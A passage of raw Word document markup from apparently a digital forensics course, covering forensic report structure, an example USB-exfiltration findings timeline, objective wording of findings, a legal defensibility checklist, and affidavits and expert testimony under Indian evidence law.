              <w:t xml:space="preserve"> and purpose (different versions can show different results)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7. Findings timeline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Chronological table: timestamp, artefact, event, significance</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8. Detailed findings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Each finding with artefact, location, timestamp, observation and forensic significance, supported by screenshots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9. Conclusion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What the evidence establishes — and what it does not</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10. Recommendations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 and remediation actions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11. Appendices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Hash values of all evidence, chain-of-custody forms, glossary, tool outputs, supporting data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings timeline — example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559"/>
        <w:gridCol w:w="2339"/>
        <w:gridCol w:w="2924"/>
        <w:gridCol w:w="2924"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>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Significance</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23:31</w:t>
            </w:r>
          </w:p>
        </w:tc>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 log, Event 4624</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Interactive logon by user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">rahul</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present on workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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23:40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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NTFS $MFT / LNK</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pricing_2024.xlsx opened</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Sensitive file accessed</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23:42</w:t>
            </w:r>
          </w:p>
        </w:tc>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 hive, USBSTOR</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USB device (serial …) first connected</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Removable storage in use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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23:47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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System log / USB records</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Device disconnected</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End of the transfer window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing for different audiences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3411"/>
        <w:gridCol w:w="3898"/>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Audience</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Needs</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Style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Management</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Impact, risk, decisions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Short, plain language, no jargon, focus on business meaning and recommendations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Technical team</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Details to fix and detect</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Precise artefacts, paths, commands, IOCs, timestamps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Court / lawyers</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Reliability, method, certainty level</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Neutral, formal, step by step; every claim tied to evidence; explain terms; avoid opinions beyond expertise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing objective findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A good report keeps three things apart: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fact → Interpretation → Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. State what the evidence shows, say what it means, and only then draw a conclusion — with the right level of certainty.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4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Weak statement</w:t>
            </w:r>
          </w:p>
        </w:tc>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Better statement</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user definitely installed malware.”</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suspicious executable was found in the user’s Temp folder, and Prefetch records show it was executed on 5 March at 14:32 UTC under the user’s account.”</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“He stole the data.”</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“Artefacts are consistent with the file being copied to a USB device with serial number … between 23:42 and 23:47. The device itself was not available for examination.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use measured words: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">shows, indicates, is consistent with, cannot be determined</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color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">State limitations and assumptions (missing logs, encrypted data, clock errors).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mention evidence that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">contradicts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> your theory — do not ignore it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Define technical terms the first time you use them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Legal defensibility checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to collect the evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown by hash values from acquisition to analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unbroken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chain of custody</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alibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeatable methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and accepted, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">validated tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with versions recorded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of actions and notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supported by evidence; competent, qualified examiner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9 Presenting Evidence — Affidavits and Expert Testimony</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Affidavit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">affidavit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a written statement of facts made </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">on oath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sworn or affirmed before an authorised officer such as a notary, magistrate or oath commissioner). In a forensic case, an investigator may submit an affidavit describing how the evidence was seized, handled and examined, and what was found. A false statement in an affidavit is a punishable offence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In India, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> about how an electronic record was produced (Section 65B of the Evidence Act, now Section 63 of the BSA, 2023) accompanies electronic evidence. The examiner may need to sign it, stating the device used, how the record was obtained and that the process was reliable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert witness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">expert witness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a person with special knowledge or skill whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">opinion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the court accepts on matters beyond ordinary knowledge. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">fact witness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reports what they saw or did; an expert may also give opinions. In India, the Central Government can notify an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Examiner of Electronic Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under Section 79A of the IT Act, whose opinion is relevant under the Evidence Act (Section 45A).</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Stage</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happens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Qualification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expert presents education, training, certifications (e.g. GCFE, CHFI, EnCE) and experience; the opposing side may challenge it</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Examination-in-chief</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lawyer who called the expert asks questions to explain the method and findings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Cross-examination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other side tests the expert’s methods, tools, assumptions, chain of custody, and possible bias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Re-examination</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first lawyer clarifies points raised in cross-examination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Be neutral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — your duty is to the court, not to the party paying you.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Speak simply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — use analogies, avoid jargon; explain hashes, timestamps and artefacts in everyday words.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stick to your expertise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; say “I don’t know” or “I did not examine that” when true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Know your report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thoroughly and bring your notes, logs and tool versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Be prepared to explain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
